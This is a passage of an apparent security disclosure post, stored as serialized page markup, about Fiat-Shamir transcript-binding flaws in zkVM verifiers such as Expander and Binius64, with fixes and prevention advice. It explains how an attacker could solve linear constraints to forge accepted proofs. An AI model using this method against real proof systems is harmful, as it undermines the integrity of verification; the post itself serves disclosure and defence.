",{"type":27,"tag":84,"props":128942,"children":128944},{"className":128943},[],[128945],{"type":33,"value":128530},{"type":33,"value":128947},". This lets an attacker choose an arbitrary false statement (e.g., a forged output) and then solve the induced linear constraints for a modified ",{"type":27,"tag":84,"props":128949,"children":128951},{"className":128950},[],[128952],{"type":33,"value":128530},{"type":33,"value":128954}," that makes the verifier's check pass.",{"type":27,"tag":36,"props":128956,"children":128957},{},[128958,128962,128964,128971,128972,128975,128982],{"type":27,"tag":12606,"props":128959,"children":128960},{},[128961],{"type":33,"value":123960},{"type":33,"value":128963}," Fixed on 21st January 2026 via ",{"type":27,"tag":47,"props":128965,"children":128968},{"href":128966,"rel":128967},"https://github.com/PolyhedraZK/Expander/commit/4a8c2be03535194c1f6b48a93ad2f5480649f7c2",[51],[128969],{"type":33,"value":128970},"commit 4a8c2be",{"type":33,"value":13740},{"type":27,"tag":38230,"props":128973,"children":128974},{},[],{"type":27,"tag":47,"props":128976,"children":128979},{"href":128977,"rel":128978},"https://blog.polyhedra.network/expander-bug-bounty/",[51],[128980],{"type":33,"value":128981},"Claimed 500k Bug bounty",{"type":33,"value":128983}," award pending",{"type":27,"tag":26063,"props":128985,"children":128986},{},[],{"type":27,"tag":58,"props":128988,"children":128990},{"id":128989},"binius64",[128991],{"type":33,"value":115094},{"type":27,"tag":36,"props":128993,"children":128994},{},[128995,128997,129124],{"type":33,"value":128996},"Binius64 is a proof system optimized for binary fields, designed to be efficient on 64-bit CPUs. Binius uses ",{"type":27,"tag":84,"props":128998,"children":129000},{"className":128999},[11266,11267],[129001],{"type":27,"tag":207,"props":129002,"children":129004},{"className":129003},[11272],[129005],{"type":27,"tag":207,"props":129006,"children":129008},{"className":129007,"ariaHidden":11278},[11277],[129009],{"type":27,"tag":207,"props":129010,"children":129012},{"className":129011},[11283],[129013,129018],{"type":27,"tag":207,"props":129014,"children":129017},{"className":129015,"style":129016},[11288],"height:0.8665em;vertical-align:-0.1776em;",[],{"type":27,"tag":207,"props":129019,"children":129021},{"className":129020},[11294],[129022,129029],{"type":27,"tag":207,"props":129023,"children":129026},{"className":129024},[11294,129025],"mathbb",[129027],{"type":33,"value":129028},"F",{"type":27,"tag":207,"props":129030,"children":129032},{"className":129031},[11309],[129033],{"type":27,"tag":207,"props":129034,"children":129036},{"className":129035},[11314,28914],[129037,129112],{"type":27,"tag":207,"props":129038,"children":129040},{"className":129039},[11319],[129041,129107],{"type":27,"tag":207,"props":129042,"children":129044},{"className":129043,"style":119583},[11324],[129045],{"type":27,"tag":207,"props":129046,"children":129048},{"style":129047},"top:-2.5224em;margin-left:0em;margin-right:0.05em;",[129049,129053],{"type":27,"tag":207,"props":129050,"children":129052},{"className":129051,"style":11334},[11333],[],{"type":27,"tag":207,"props":129054,"children":129056},{"className":129055},[11339,11340,11341,11342],[129057],{"type":27,"tag":207,"props":129058,"children":129060},{"className":129059},[11294,11342],[129061],{"type":27,"tag":207,"props":129062,"children":129064},{"className":129063},[11294,11342],[129065,129070],{"type":27,"tag":207,"props":129066,"children":129068},{"className":129067},[11294,11342],[129069],{"type":33,"value":1744},{"type":27,"tag":207,"props":129071,"children":129073},{"className":129072},[11309],[129074],{"type":27,"tag":207,"props":129075,"children":129077},{"className":129076},[11314],[129078],{"type":27,"tag":207,"props":129079,"children":129081},{"className":129080},[11319],[129082],{"type":27,"tag":207,"props":129083,"children":129086},{"className":129084,"style":129085},[11324],"height:0.7463em;",[129087],{"type":27,"tag":207,"props":129088,"children":129089},{"style":119708},[129090,129094],{"type":27,"tag":207,"props":129091,"children":129093},{"className":129092,"style":116111},[11333],[],{"type":27,"tag":207,"props":129095,"children":129097},{"className":129096},[11339,116116,116117,11342],[129098],{"type":27,"tag":207,"props":129099,"children":129101},{"className":129100},[11294,11342],[129102],{"type":27,"tag":207,"props":129103,"children":129105},{"className":129104},[11294,11342],[129106],{"type":33,"value":6837},{"type":27,"tag":207,"props":129108,"children":129110},{"className":129109},[29017],[129111],{"type":33,"value":29020},{"type":27,"tag":207,"props":129113,"children":129115},{"className":129114},[11319],[129116],{"type":27,"tag":207,"props":129117,"children":129120},{"className":129118,"style":129119},[11324],"height:0.1776em;",[129121],{"type":27,"tag":207,"props":129122,"children":129123},{},[],{"type":33,"value":129125}," (or variants thereof), where addition is XOR. This makes certain operations very fast.",{"type":27,"tag":36,"props":129127,"children":129128},{},[129129,129131,129136],{"type":33,"value":129130},"One of Binius's key features is its specialized protocols for bitwise operations. The ",{"type":27,"tag":12606,"props":129132,"children":129133},{},[129134],{"type":33,"value":129135},"Shift Protocol",{"type":33,"value":129137}," efficiently handles bit-shifts and rotations (essential for hash functions like SHA-256) without the massive overhead typical in other proof systems.",{"type":27,"tag":36,"props":129139,"children":129140},{},[129141],{"type":27,"tag":12606,"props":129142,"children":129143},{},[129144],{"type":33,"value":128562},{"type":27,"tag":36,"props":129146,"children":129147},{},[129148],{"type":33,"value":129149},"The verifier receives the public witness (program inputs/outputs) as a separate parameter:",{"type":27,"tag":101,"props":129151,"children":129153},{"code":129152,"language":10269,"meta":7,"className":10270,"style":7},"pub fn verify\u003CF, C>(\n constraint_system: &ConstraintSystem,\n public: &[Word], // \u003C- NEVER ABSORBED\n // ...\n) -> Result\u003CVerifyOutput\u003CF>, Error>\n",[129154],{"type":27,"tag":84,"props":129155,"children":129156},{"__ignoreMap":7},[129157,129192,129217,129251,129259],{"type":27,"tag":207,"props":129158,"children":129159},{"class":209,"line":210},[129160,129164,129168,129172,129176,129180,129184,129188],{"type":27,"tag":207,"props":129161,"children":129162},{"style":214},[129163],{"type":33,"value":20967},{"type":27,"tag":207,"props":129165,"children":129166},{"style":214},[129167],{"type":33,"value":20972},{"type":27,"tag":207,"props":129169,"children":129170},{"style":1335},[129171],{"type":33,"value":15447},{"type":27,"tag":207,"props":129173,"children":129174},{"style":238},[129175],{"type":33,"value":9257},{"type":27,"tag":207,"props":129177,"children":129178},{"style":8920},[129179],{"type":33,"value":129028},{"type":27,"tag":207,"props":129181,"children":129182},{"style":238},[129183],{"type":33,"value":1123},{"type":27,"tag":207,"props":129185,"children":129186},{"style":8920},[129187],{"type":33,"value":123479},{"type":27,"tag":207,"props":129189,"children":129190},{"style":238},[129191],{"type":33,"value":13870},{"type":27,"tag":207,"props":129193,"children":129194},{"class":209,"line":244},[129195,129200,129204,129208,129213],{"type":27,"tag":207,"props":129196,"children":129197},{"style":220},[129198],{"type":33,"value":129199}," constraint_system",{"type":27,"tag":207,"props":129201,"children":129202},{"style":226},[129203],{"type":33,"value":736},{"type":27,"tag":207,"props":129205,"children":129206},{"style":226},[129207],{"type":33,"value":14423},{"type":27,"tag":207,"props":129209,"children":129210},{"style":8920},[129211],{"type":33,"value":129212},"ConstraintSystem",{"type":27,"tag":207,"props":129214,"children":129215},{"style":238},[129216],{"type":33,"value":1842},{"type":27,"tag":207,"props":129218,"children":129219},{"class":209,"line":270},[129220,129224,129228,129232,129236,129241,129246],{"type":27,"tag":207,"props":129221,"children":129222},{"style":220},[129223],{"type":33,"value":14804},{"type":27,"tag":207,"props":129225,"children":129226},{"style":226},[129227],{"type":33,"value":736},{"type":27,"tag":207,"props":129229,"children":129230},{"style":226},[129231],{"type":33,"value":14423},{"type":27,"tag":207,"props":129233,"children":129234},{"style":238},[129235],{"type":33,"value":11019},{"type":27,"tag":207,"props":129237,"children":129238},{"style":8920},[129239],{"type":33,"value":129240},"Word",{"type":27,"tag":207,"props":129242,"children":129243},{"style":238},[129244],{"type":33,"value":129245},"], ",{"type":27,"tag":207,"props":129247,"children":129248},{"style":4647},[129249],{"type":33,"value":129250},"// \u003C- NEVER ABSORBED\n",{"type":27,"tag":207,"props":129252,"children":129253},{"class":209,"line":296},[129254],{"type":27,"tag":207,"props":129255,"children":129256},{"style":4647},[129257],{"type":33,"value":129258}," // ...\n",{"type":27,"tag":207,"props":129260,"children":129261},{"class":209,"line":445},[129262,129266,129270,129274,129278,129283,129287,129291,129295,129299],{"type":27,"tag":207,"props":129263,"children":129264},{"style":238},[129265],{"type":33,"value":2222},{"type":27,"tag":207,"props":129267,"children":129268},{"style":226},[129269],{"type":33,"value":8968},{"type":27,"tag":207,"props":129271,"children":129272},{"style":8920},[129273],{"type":33,"value":21038},{"type":27,"tag":207,"props":129275,"children":129276},{"style":238},[129277],{"type":33,"value":9257},{"type":27,"tag":207,"props":129279,"children":129280},{"style":8920},[129281],{"type":33,"value":129282},"VerifyOutput",{"type":27,"tag":207,"props":129284,"children":129285},{"style":238},[129286],{"type":33,"value":9257},{"type":27,"tag":207,"props":129288,"children":129289},{"style":8920},[129290],{"type":33,"value":129028},{"type":27,"tag":207,"props":129292,"children":129293},{"style":238},[129294],{"type":33,"value":13912},{"type":27,"tag":207,"props":129296,"children":129297},{"style":8920},[129298],{"type":33,"value":44648},{"type":27,"tag":207,"props":129300,"children":129301},{"style":238},[129302],{"type":33,"value":13274},{"type":27,"tag":36,"props":129304,"children":129305},{},[129306,129308,129314,129315,129321,129323,129327],{"type":33,"value":129307},"In the shift protocol, challenges ",{"type":27,"tag":84,"props":129309,"children":129311},{"className":129310},[],[129312],{"type":33,"value":129313},"r_j",{"type":33,"value":1131},{"type":27,"tag":84,"props":129316,"children":129318},{"className":129317},[],[129319],{"type":33,"value":129320},"inout_eval_point",{"type":33,"value":129322}," are sampled ",{"type":27,"tag":12606,"props":129324,"children":129325},{},[129326],{"type":33,"value":111796},{"type":33,"value":129328}," the public witness is bound.",{"type":27,"tag":36,"props":129330,"children":129331},{},[129332],{"type":27,"tag":12606,"props":129333,"children":129334},{},[129335],{"type":33,"value":122682},{"type":27,"tag":36,"props":129337,"children":129338},{},[129339],{"type":27,"tag":126,"props":129340,"children":129343},{"alt":129341,"src":129342},"10_binius","/posts/zkvms-unfaithful-claims/10_binius.svg",[],{"type":27,"tag":36,"props":129345,"children":129346},{},[129347],{"type":33,"value":129348},"During verification",{"type":27,"tag":12719,"props":129350,"children":129351},{},[129352,129372,129384,129403],{"type":27,"tag":1232,"props":129353,"children":129354},{},[129355,129357,129362,129364,129370],{"type":33,"value":129356},"Sumcheck produces challenge points ",{"type":27,"tag":84,"props":129358,"children":129360},{"className":129359},[],[129361],{"type":33,"value":129313},{"type":33,"value":129363}," (bit indices) and ",{"type":27,"tag":84,"props":129365,"children":129367},{"className":129366},[],[129368],{"type":33,"value":129369},"r_s",{"type":33,"value":129371}," (shift indices)",{"type":27,"tag":1232,"props":129373,"children":129374},{},[129375,129377,129382],{"type":33,"value":129376},"Verifier samples ",{"type":27,"tag":84,"props":129378,"children":129380},{"className":129379},[],[129381],{"type":33,"value":129320},{"type":33,"value":129383}," from transcript",{"type":27,"tag":1232,"props":129385,"children":129386},{},[129387,129389,129395,129397,129402],{"type":33,"value":129388},"Verifier computes ",{"type":27,"tag":84,"props":129390,"children":129392},{"className":129391},[],[129393],{"type":33,"value":129394},"public_eval = MLE(public, r_j, inout_eval_point)",{"type":33,"value":129396}," using the unbound ",{"type":27,"tag":84,"props":129398,"children":129400},{"className":129399},[],[129401],{"type":33,"value":68907},{"type":33,"value":25404},{"type":27,"tag":1232,"props":129404,"children":129405},{},[129406,129407,129413],{"type":33,"value":23888},{"type":27,"tag":84,"props":129408,"children":129410},{"className":129409},[],[129411],{"type":33,"value":129412},"public_eval",{"type":33,"value":129414}," feeds into subsequent verification equations",{"type":27,"tag":36,"props":129416,"children":129417},{},[129418],{"type":33,"value":129419},"The MLE evaluation is linear in the public witness bits:",{"type":27,"tag":36,"props":129421,"children":129422},{},[129423],{"type":27,"tag":84,"props":129424,"children":129426},{"className":129425},[11266,11267],[129427],{"type":27,"tag":207,"props":129428,"children":129430},{"className":129429},[11272],[129431],{"type":27,"tag":207,"props":129432,"children":129434},{"className":129433,"ariaHidden":11278},[11277],[129435,129479,129619,129731],{"type":27,"tag":207,"props":129436,"children":129438},{"className":129437},[11283],[129439,129443,129452,129457,129466,129470,129475],{"type":27,"tag":207,"props":129440,"children":129442},{"className":129441,"style":101677},[11288],[],{"type":27,"tag":207,"props":129444,"children":129446},{"className":129445},[11294,33],[129447],{"type":27,"tag":207,"props":129448,"children":129450},{"className":129449},[11294],[129451],{"type":33,"value":68907},{"type":27,"tag":207,"props":129453,"children":129455},{"className":129454,"style":100264},[11294],[129456],{"type":33,"value":10371},{"type":27,"tag":207,"props":129458,"children":129460},{"className":129459},[11294,33],[129461],{"type":27,"tag":207,"props":129462,"children":129464},{"className":129463},[11294],[129465],{"type":33,"value":8871},{"type":27,"tag":207,"props":129467,"children":129469},{"className":129468,"style":11470},[11372],[],{"type":27,"tag":207,"props":129471,"children":129473},{"className":129472},[11475],[129474],{"type":33,"value":10380},{"type":27,"tag":207,"props":129476,"children":129478},{"className":129477,"style":11470},[11372],[],{"type":27,"tag":207,"props":129480,"children":129482},{"className":129481},[11283],[129483,129487,129559,129563,129576,129581,129586,129591,129596,129601,129606,129610,129615],{"type":27,"tag":207,"props":129484,"children":129486},{"className":129485,"style":126012},[11288],[],{"type":27,"tag":207,"props":129488,"children":129490},{"className":129489},[28896],[129491,129496],{"type":27,"tag":207,"props":129492,"children":129494},{"className":129493,"style":28903},[28896,28901,28902],[129495],{"type":33,"value":116046},{"type":27,"tag":207,"props":129497,"children":129499},{"className":129498},[11309],[129500],{"type":27,"tag":207,"props":129501,"children":129503},{"className":129502},[11314,28914],[129504,129548],{"type":27,"tag":207,"props":129505,"children":129507},{"className":129506},[11319],[129508,129543],{"type":27,"tag":207,"props":129509,"children":129511},{"className":129510,"style":120923},[11324],[129512],{"type":27,"tag":207,"props":129513,"children":129514},{"style":28927},[129515,129519],{"type":27,"tag":207,"props":129516,"children":129518},{"className":129517,"style":11334},[11333],[],{"type":27,"tag":207,"props":129520,"children":129522},{"className":129521},[11339,11340,11341,11342],[129523],{"type":27,"tag":207,"props":129524,"children":129526},{"className":129525},[11294,11342],[129527,129533,129538],{"type":27,"tag":207,"props":129528,"children":129531},{"className":129529,"style":129530},[11294,28860,11342],"margin-right:0.02691em;",[129532],{"type":33,"value":56810},{"type":27,"tag":207,"props":129534,"children":129536},{"className":129535},[11404,11342],[129537],{"type":33,"value":11407},{"type":27,"tag":207,"props":129539,"children":129541},{"className":129540},[11294,28860,11342],[129542],{"type":33,"value":10512},{"type":27,"tag":207,"props":129544,"children":129546},{"className":129545},[29017],[129547],{"type":33,"value":29020},{"type":27,"tag":207,"props":129549,"children":129551},{"className":129550},[11319],[129552],{"type":27,"tag":207,"props":129553,"children":129555},{"className":129554,"style":121489},[11324],[129556],{"type":27,"tag":207,"props":129557,"children":129558},{},[],{"type":27,"tag":207,"props":129560,"children":129562},{"className":129561,"style":11411},[11372],[],{"type":27,"tag":207,"props":129564,"children":129566},{"className":129565},[11294],[129567],{"type":27,"tag":207,"props":129568,"children":129570},{"className":129569},[11294,33],[129571],{"type":27,"tag":207,"props":129572,"children":129574},{"className":129573},[11294],[129575],{"type":33,"value":68907},{"type":27,"tag":207,"props":129577,"children":129579},{"className":129578},[28989],[129580],{"type":33,"value":11019},{"type":27,"tag":207,"props":129582,"children":129584},{"className":129583,"style":129530},[11294,28860],[129585],{"type":33,"value":56810},{"type":27,"tag":207,"props":129587,"children":129589},{"className":129588},[29011],[129590],{"type":33,"value":22686},{"type":27,"tag":207,"props":129592,"children":129594},{"className":129593},[28989],[129595],{"type":33,"value":11019},{"type":27,"tag":207,"props":129597,"children":129599},{"className":129598},[11294,28860],[129600],{"type":33,"value":10512},{"type":27,"tag":207,"props":129602,"children":129604},{"className":129603},[29011],[129605],{"type":33,"value":22686},{"type":27,"tag":207,"props":129607,"children":129609},{"className":129608,"style":11373},[11372],[],{"type":27,"tag":207,"props":129611,"children":129613},{"className":129612},[11378],[129614],{"type":33,"value":118513},{"type":27,"tag":207,"props":129616,"children":129618},{"className":129617,"style":11373},[11372],[],{"type":27,"tag":207,"props":129620,"children":129622},{"className":129621},[11283],[129623,129628,129637,129642,129647,129652,129656,129713,129718,129722,129727],{"type":27,"tag":207,"props":129624,"children":129627},{"className":129625,"style":129626},[11288],"height:1.0361em;vertical-align:-0.2861em;",[],{"type":27,"tag":207,"props":129629,"children":129631},{"className":129630},[11294,33],[129632],{"type":27,"tag":207,"props":129633,"children":129635},{"className":129634},[11294],[129636],{"type":33,"value":119840},{"type":27,"tag":207,"props":129638,"children":129640},{"className":129639},[28989],[129641],{"type":33,"value":1343},{"type":27,"tag":207,"props":129643,"children":129645},{"className":129644},[11294,28860],[129646],{"type":33,"value":10512},{"type":27,"tag":207,"props":129648,"children":129650},{"className":129649},[11404],[129651],{"type":33,"value":11407},{"type":27,"tag":207,"props":129653,"children":129655},{"className":129654,"style":11411},[11372],[],{"type":27,"tag":207,"props":129657,"children":129659},{"className":129658},[11294],[129660,129665],{"type":27,"tag":207,"props":129661,"children":129663},{"className":129662,"style":100264},[11294,28860],[129664],{"type":33,"value":101083},{"type":27,"tag":207,"props":129666,"children":129668},{"className":129667},[11309],[129669],{"type":27,"tag":207,"props":129670,"children":129672},{"className":129671},[11314,28914],[129673,129702],{"type":27,"tag":207,"props":129674,"children":129676},{"className":129675},[11319],[129677,129697],{"type":27,"tag":207,"props":129678,"children":129680},{"className":129679,"style":100793},[11324],[129681],{"type":27,"tag":207,"props":129682,"children":129683},{"style":117250},[129684,129688],{"type":27,"tag":207,"props":129685,"children":129687},{"className":129686,"style":11334},[11333],[],{"type":27,"tag":207,"props":129689,"children":129691},{"className":129690},[11339,11340,11341,11342],[129692],{"type":27,"tag":207,"props":129693,"children":129695},{"className":129694,"style":121474},[11294,28860,11342],[129696],{"type":33,"value":15937},{"type":27,"tag":207,"props":129698,"children":129700},{"className":129699},[29017],[129701],{"type":33,"value":29020},{"type":27,"tag":207,"props":129703,"children":129705},{"className":129704},[11319],[129706],{"type":27,"tag":207,"props":129707,"children":129709},{"className":129708,"style":126160},[11324],[129710],{"type":27,"tag":207,"props":129711,"children":129712},{},[],{"type":27,"tag":207,"props":129714,"children":129716},{"className":129715},[29011],[129717],{"type":33,"value":10416},{"type":27,"tag":207,"props":129719,"children":129721},{"className":129720,"style":11373},[11372],[],{"type":27,"tag":207,"props":129723,"children":129725},{"className":129724},[11378],[129726],{"type":33,"value":118513},{"type":27,"tag":207,"props":129728,"children":129730},{"className":129729,"style":11373},[11372],[],{"type":27,"tag":207,"props":129732,"children":129734},{"className":129733},[11283],[129735,129739,129748,129753,129758,129763,129767,129777,129782,129791,129796,129805],{"type":27,"tag":207,"props":129736,"children":129738},{"className":129737,"style":100206},[11288],[],{"type":27,"tag":207,"props":129740,"children":129742},{"className":129741},[11294,33],[129743],{"type":27,"tag":207,"props":129744,"children":129746},{"className":129745},[11294],[129747],{"type":33,"value":119840},{"type":27,"tag":207,"props":129749,"children":129751},{"className":129750},[28989],[129752],{"type":33,"value":1343},{"type":27,"tag":207,"props":129754,"children":129756},{"className":129755,"style":129530},[11294,28860],[129757],{"type":33,"value":56810},{"type":27,"tag":207,"props":129759,"children":129761},{"className":129760},[11404],[129762],{"type":33,"value":11407},{"type":27,"tag":207,"props":129764,"children":129766},{"className":129765,"style":11411},[11372],[],{"type":27,"tag":207,"props":129768,"children":129770},{"className":129769},[11294,33],[129771],{"type":27,"tag":207,"props":129772,"children":129774},{"className":129773},[11294],[129775],{"type":33,"value":129776},"inout",{"type":27,"tag":207,"props":129778,"children":129780},{"className":129779,"style":100264},[11294],[129781],{"type":33,"value":10371},{"type":27,"tag":207,"props":129783,"children":129785},{"className":129784},[11294,33],[129786],{"type":27,"tag":207,"props":129787,"children":129789},{"className":129788},[11294],[129790],{"type":33,"value":8871},{"type":27,"tag":207,"props":129792,"children":129794},{"className":129793,"style":100264},[11294],[129795],{"type":33,"value":10371},{"type":27,"tag":207,"props":129797,"children":129799},{"className":129798},[11294,33],[129800],{"type":27,"tag":207,"props":129801,"children":129803},{"className":129802},[11294],[129804],{"type":33,"value":125035},{"type":27,"tag":207,"props":129806,"children":129808},{"className":129807},[29011],[129809],{"type":33,"value":10416},{"type":27,"tag":36,"props":129811,"children":129812},{},[129813,129815,129820,129822,129895],{"type":33,"value":129814},"With challenges fixed (independent of ",{"type":27,"tag":84,"props":129816,"children":129818},{"className":129817},[],[129819],{"type":33,"value":68907},{"type":33,"value":129821},"), an attacker can find an alternate witness ",{"type":27,"tag":84,"props":129823,"children":129825},{"className":129824},[11266,11267],[129826],{"type":27,"tag":207,"props":129827,"children":129829},{"className":129828},[11272],[129830],{"type":27,"tag":207,"props":129831,"children":129833},{"className":129832,"ariaHidden":11278},[11277],[129834],{"type":27,"tag":207,"props":129835,"children":129837},{"className":129836},[11283],[129838,129843],{"type":27,"tag":207,"props":129839,"children":129842},{"className":129840,"style":129841},[11288],"height:1.0307em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":129844,"children":129846},{"className":129845},[11294],[129847,129856],{"type":27,"tag":207,"props":129848,"children":129850},{"className":129849},[11294,33],[129851],{"type":27,"tag":207,"props":129852,"children":129854},{"className":129853},[11294],[129855],{"type":33,"value":68907},{"type":27,"tag":207,"props":129857,"children":129859},{"className":129858},[11309],[129860],{"type":27,"tag":207,"props":129861,"children":129863},{"className":129862},[11314],[129864],{"type":27,"tag":207,"props":129865,"children":129867},{"className":129866},[11319],[129868],{"type":27,"tag":207,"props":129869,"children":129872},{"className":129870,"style":129871},[11324],"height:0.8362em;",[129873],{"type":27,"tag":207,"props":129874,"children":129876},{"style":129875},"top:-3.1473em;margin-right:0.05em;",[129877,129881],{"type":27,"tag":207,"props":129878,"children":129880},{"className":129879,"style":11334},[11333],[],{"type":27,"tag":207,"props":129882,"children":129884},{"className":129883},[11339,11340,11341,11342],[129885],{"type":27,"tag":207,"props":129886,"children":129888},{"className":129887},[11294,11342],[129889],{"type":27,"tag":207,"props":129890,"children":129892},{"className":129891},[11294,11342],[129893],{"type":33,"value":129894},"′",{"type":33,"value":129896}," that produces the same evaluation. This is a single 128-bit linear constraint over hundreds of bits, yielding a single linear equation in a high-dimensional binary witness space, which is typically underconstrained and admits many alternative witnesses under common parameterizations.",{"type":27,"tag":36,"props":129898,"children":129899},{},[129900,129904,129906],{"type":27,"tag":12606,"props":129901,"children":129902},{},[129903],{"type":33,"value":123960},{"type":33,"value":129905}," Fixed on December 29, 2025 via ",{"type":27,"tag":47,"props":129907,"children":129910},{"href":129908,"rel":129909},"https://github.com/binius-zk/binius64/pull/1355/commits/86a515f0632d2acdf547ed82780dfe7f9f39358f",[51],[129911],{"type":33,"value":129912},"commit 86a515f",{"type":27,"tag":26063,"props":129914,"children":129915},{},[],{"type":27,"tag":28,"props":129917,"children":129919},{"id":129918},"why-does-this-keep-happening",[129920],{"type":33,"value":129921},"Why Does This Keep Happening?",{"type":27,"tag":36,"props":129923,"children":129924},{},[129925],{"type":33,"value":129926},"Given that we found the same bug class in six independent implementations, at some point we have to ask whether there is a systemic issue making this mistake so common.",{"type":27,"tag":58,"props":129928,"children":129930},{"id":129929},"academic-papers-dont-specify-fiat-shamir",[129931],{"type":33,"value":129932},"Academic Papers Don't Specify Fiat-Shamir",{"type":27,"tag":36,"props":129934,"children":129935},{},[129936,129938,129943,129945,129970,129972,129975,129977,130002,130004,130031],{"type":33,"value":129937},"Academic papers usually describe ",{"type":27,"tag":942,"props":129939,"children":129940},{},[129941],{"type":33,"value":129942},"interactive",{"type":33,"value":129944}," protocols: \"Prover sends ",{"type":27,"tag":84,"props":129946,"children":129948},{"className":129947},[11266,11267],[129949],{"type":27,"tag":207,"props":129950,"children":129952},{"className":129951},[11272],[129953],{"type":27,"tag":207,"props":129954,"children":129956},{"className":129955,"ariaHidden":11278},[11277],[129957],{"type":27,"tag":207,"props":129958,"children":129960},{"className":129959},[11283],[129961,129965],{"type":27,"tag":207,"props":129962,"children":129964},{"className":129963,"style":28855},[11288],[],{"type":27,"tag":207,"props":129966,"children":129968},{"className":129967,"style":29392},[11294,28860],[129969],{"type":33,"value":123479},{"type":33,"value":129971},". Verifier sends",{"type":27,"tag":38230,"props":129973,"children":129974},{},[],{"type":33,"value":129976},"random ",{"type":27,"tag":84,"props":129978,"children":129980},{"className":129979},[11266,11267],[129981],{"type":27,"tag":207,"props":129982,"children":129984},{"className":129983},[11272],[129985],{"type":27,"tag":207,"props":129986,"children":129988},{"className":129987,"ariaHidden":11278},[11277],[129989],{"type":27,"tag":207,"props":129990,"children":129992},{"className":129991},[11283],[129993,129997],{"type":27,"tag":207,"props":129994,"children":129996},{"className":129995,"style":118092},[11288],[],{"type":27,"tag":207,"props":129998,"children":130000},{"className":129999,"style":100264},[11294,28860],[130001],{"type":33,"value":101083},{"type":33,"value":130003},". Prover sends ",{"type":27,"tag":84,"props":130005,"children":130007},{"className":130006},[11266,11267],[130008],{"type":27,"tag":207,"props":130009,"children":130011},{"className":130010},[11272],[130012],{"type":27,"tag":207,"props":130013,"children":130015},{"className":130014,"ariaHidden":11278},[11277],[130016],{"type":27,"tag":207,"props":130017,"children":130019},{"className":130018},[11283],[130020,130024],{"type":27,"tag":207,"props":130021,"children":130023},{"className":130022,"style":28855},[11288],[],{"type":27,"tag":207,"props":130025,"children":130028},{"className":130026,"style":130027},[11294,28860],"margin-right:0.00773em;",[130029],{"type":33,"value":130030},"R",{"type":33,"value":130032},".\"",{"type":27,"tag":36,"props":130034,"children":130035},{},[130036,130038,130063,130065,130090],{"type":33,"value":130037},"They often omit the necessary steps to make the protocol non-interactive: \"Hash ",{"type":27,"tag":84,"props":130039,"children":130041},{"className":130040},[11266,11267],[130042],{"type":27,"tag":207,"props":130043,"children":130045},{"className":130044},[11272],[130046],{"type":27,"tag":207,"props":130047,"children":130049},{"className":130048,"ariaHidden":11278},[11277],[130050],{"type":27,"tag":207,"props":130051,"children":130053},{"className":130052},[11283],[130054,130058],{"type":27,"tag":207,"props":130055,"children":130057},{"className":130056,"style":28855},[11288],[],{"type":27,"tag":207,"props":130059,"children":130061},{"className":130060,"style":29392},[11294,28860],[130062],{"type":33,"value":123479},{"type":33,"value":130064}," before sampling ",{"type":27,"tag":84,"props":130066,"children":130068},{"className":130067},[11266,11267],[130069],{"type":27,"tag":207,"props":130070,"children":130072},{"className":130071},[11272],[130073],{"type":27,"tag":207,"props":130074,"children":130076},{"className":130075,"ariaHidden":11278},[11277],[130077],{"type":27,"tag":207,"props":130078,"children":130080},{"className":130079},[11283],[130081,130085],{"type":27,"tag":207,"props":130082,"children":130084},{"className":130083,"style":118092},[11288],[],{"type":27,"tag":207,"props":130086,"children":130088},{"className":130087,"style":100264},[11294,28860],[130089],{"type":33,"value":101083},{"type":33,"value":130091},". Also hash the public statement. Also hash intermediate values that affect later equations.\"",{"type":27,"tag":36,"props":130093,"children":130094},{},[130095],{"type":33,"value":130096},"Security proofs thus also analyze the interactive protocols where binding is implicit. The responsibility of determining what to include in the transcript therefore falls on the implementor, which may not have a good understanding of the full protocol.",{"type":27,"tag":58,"props":130098,"children":130100},{"id":130099},"the-hot-potato-problem",[130101],{"type":33,"value":130102},"The Hot Potato Problem",{"type":27,"tag":36,"props":130104,"children":130105},{},[130106],{"type":33,"value":130107},"Modern zkVMs are modular:",{"type":27,"tag":36,"props":130109,"children":130110},{},[130111],{"type":27,"tag":126,"props":130112,"children":130115},{"alt":130113,"src":130114},"11_hot_potato","/posts/zkvms-unfaithful-claims/11_hot_potato.svg",[],{"type":27,"tag":36,"props":130117,"children":130118},{},[130119],{"type":33,"value":130120},"It often happens that each layer assumes the previous/next layer handles the transcript binding for a value, so in the end it never happens.",{"type":27,"tag":58,"props":130122,"children":130124},{"id":130123},"optimization-pressure",[130125],{"type":33,"value":130126},"Optimization Pressure",{"type":27,"tag":36,"props":130128,"children":130129},{},[130130],{"type":33,"value":130131},"Performance is existential for ZK. Since every hash operation has a cost, there is constant pressure to exclude values that are \"probably fine\" to leave out.",{"type":27,"tag":36,"props":130133,"children":130134},{},[130135],{"type":33,"value":130136},"There are indeed cases when this can be done safely, but determining what is safe requires a full understanding of all protocols involved, and the decision to exclude something should be double and triple checked by experts.",{"type":27,"tag":58,"props":130138,"children":130140},{"id":130139},"testing-doesnt-catch-adversarial-inputs",[130141],{"type":33,"value":130142},"Testing Doesn't Catch Adversarial Inputs",{"type":27,"tag":36,"props":130144,"children":130145},{},[130146],{"type":33,"value":130147},"Unit tests run the honest prover. Integration tests run the honest prover. Fuzzing only randomly perturbs values and has a very low probability of succeeding in fooling a verifier. Identifying Fiat-Shamir bugs requires thorough manual security analysis, and sometimes even that falls short.",{"type":27,"tag":26063,"props":130149,"children":130150},{},[],{"type":27,"tag":28,"props":130152,"children":130154},{"id":130153},"how-to-find-and-fix-these-bugs",[130155],{"type":33,"value":130156},"How to Find and Fix These Bugs",{"type":27,"tag":58,"props":130158,"children":130160},{"id":130159},"prevention",[130161],{"type":33,"value":130162},"Prevention",{"type":27,"tag":36,"props":130164,"children":130165},{},[130166],{"type":33,"value":130167},"Fiat-Shamir has long been a known source of soundness bugs, which has driven the development of primitives that make implementation less error-prone.",{"type":27,"tag":36,"props":130169,"children":130170},{},[130171],{"type":33,"value":130172},"One such tool is to merge the proof and transcript, to force all values that are sent by the prover to be automatically absorbed into the transcript.",{"type":27,"tag":36,"props":130174,"children":130175},{},[130176],{"type":33,"value":130177},"The prover holds a proof buffer which emulates the communication channel between prover and verifier. When a value is sent by the prover it is added to the proof buffer and automatically absorbed into the transcript. When the prover then needs to read a challenge from the verifier it simply squeezes from the current transcript.",{"type":27,"tag":36,"props":130179,"children":130180},{},[130181],{"type":33,"value":130182},"This can then be done in reverse for the verifier. It gradually reads values from the proof buffer and can thus sync the transcript state and derive the same challenges.",{"type":27,"tag":36,"props":130184,"children":130185},{},[130186],{"type":33,"value":130187},"Halo2 follows this pattern, and Binius is transcript-centric as well. But even with a merged 